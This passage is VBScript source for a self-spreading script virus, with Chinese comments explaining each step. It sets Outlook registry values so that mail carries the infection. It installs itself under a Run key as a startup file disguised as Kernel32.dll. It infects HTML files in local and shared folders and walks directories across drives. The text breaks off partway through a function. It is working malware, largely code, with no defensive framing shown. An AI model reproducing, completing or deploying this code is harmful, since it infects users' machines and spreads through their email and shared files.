Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows
Messaging
Subsystem\Profiles\Microsoft Outlook Internet
Settings\0a0d020000000000c000000000000046\001e0360","blank")
Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows
NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook
Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")
WsShell.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Office\10.0
\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
KJummageFolder(Left(WinPath,3) & "Program Files\Common
Files\Microsoft
Shared\Stationery")
End Function
' 函数:KJCreateMilieu()
' 功能:创建系统环境
Function KJCreateMilieu()
On Error Resume Next
TempPath = ""
' 判断操作系统是NT/2000还是9X
If Not(FSO.FileExists(WinPath & "WScript.exe")) Then
TempPath = "system32\"
End If
' 为了文件名起到迷惑性,并且不会与系统文件冲突。
' 如果是NT/2000则启动文件为system\Kernel32.dll
' 如果是9x启动文件则为system\Kernel.dll
If TempPath = "system32\" Then
StartUpFile = WinPath & "SYSTEM\Kernel32.dll"
Else
StartUpFile = WinPath & "SYSTEM\Kernel.dll"
End If
' 添加Run值,添加刚才生成的启动文件路径
WsShell.RegWrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32
",StartUpFile
' 启动时加载的病毒文件中写入病毒体
Set FileTemp = FSO.OpenTextFile(StartUpFile,2,true)
FileTemp.Write VbsText
FileTemp.Close
End Function
' 函数:KJLikeIt()
' 功能:针对html文件进行处理,如果访问的是本地的或者共享上的文件,将感染
这个目录
Function KJLikeIt()
' 如果当前执行文件不是"html"的就退出程序
If InWhere <> "html" Then
Exit Function
End If
' 取得文档当前路径
ThisLocation = document.location
' 如果是本地或网上共享文件
If Left(ThisLocation, 4) = "file" Then
ThisLocation = Mid(ThisLocation,9)
' 如果这个文件扩展名不为空,在ThisLocation中保存它的路径
If FSO.GetExtensionName(ThisLocation) <> "" then
ThisLocation = Left(ThisLocation,Len(ThisLocation) -
Len(FSO.GetFileName(ThisLocation)))
End If
' 如果ThisLocation的长度大于3就尾追一个"\"
If Len(ThisLocation) > 3 Then
ThisLocation = ThisLocation & "\"
End If
' 感染这个目录
KJummageFolder(ThisLocation)
End If
End Function
' 函数:KJMailReg(RegStr,FileName)
' 功能:如果注册表指定键值不存在,则向指定位置写入指定文件名
' 参数:
' RegStr 注册表指定键值
' FileName 指定文件名
Function KJMailReg(RegStr,FileName)
On Error Resume Next
' 如果注册表指定键值不存在,则向指定位置写入指定文件名
RegTempStr = WsShell.RegRead(RegStr)
If RegTempStr = "" Then
WsShell.RegWrite RegStr,FileName
End If
End Function
' 函数:KJOboSub(CurrentString)
' 功能:遍历并返回目录路径
' 参数:
' CurrentString 当前目录
Function KJOboSub(CurrentString)
SubE = 0
TestOut = 0
Do While True
TestOut = TestOut + 1
If TestOut > 28 Then
CurrentString = FinalyDisk & ":\"
Exit Do
End If
On Error Resume Next
' 取得当前目录的所有子目录,并且放到字典中
Set ThisFolder = FSO.GetFolder(CurrentString)
Set DicSub = CreateObject("Scripting.Dictionary")
Set Folders = ThisFolder.SubFolders
FolderCount = 0
For Each TempFolder in Folders
FolderCount = FolderCount + 1
DicSub.add FolderCount, TempFolder.Name
Next
' 如果没有子目录了,就调用KJChangeSub返回上一级目录或者更换盘
符,并将SubE置1
If DicSub.Count = 0 Then
LastIndexChar =
InstrRev(CurrentString,"\",Len(CurrentString)-1)
SubString =
Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)
CurrentString = KJChangeSub(CurrentString,LastIndexChar)
SubE = 1
Else
' 如果存在子目录
' 如果SubE为0,则将CurrentString变为它的第1个子目录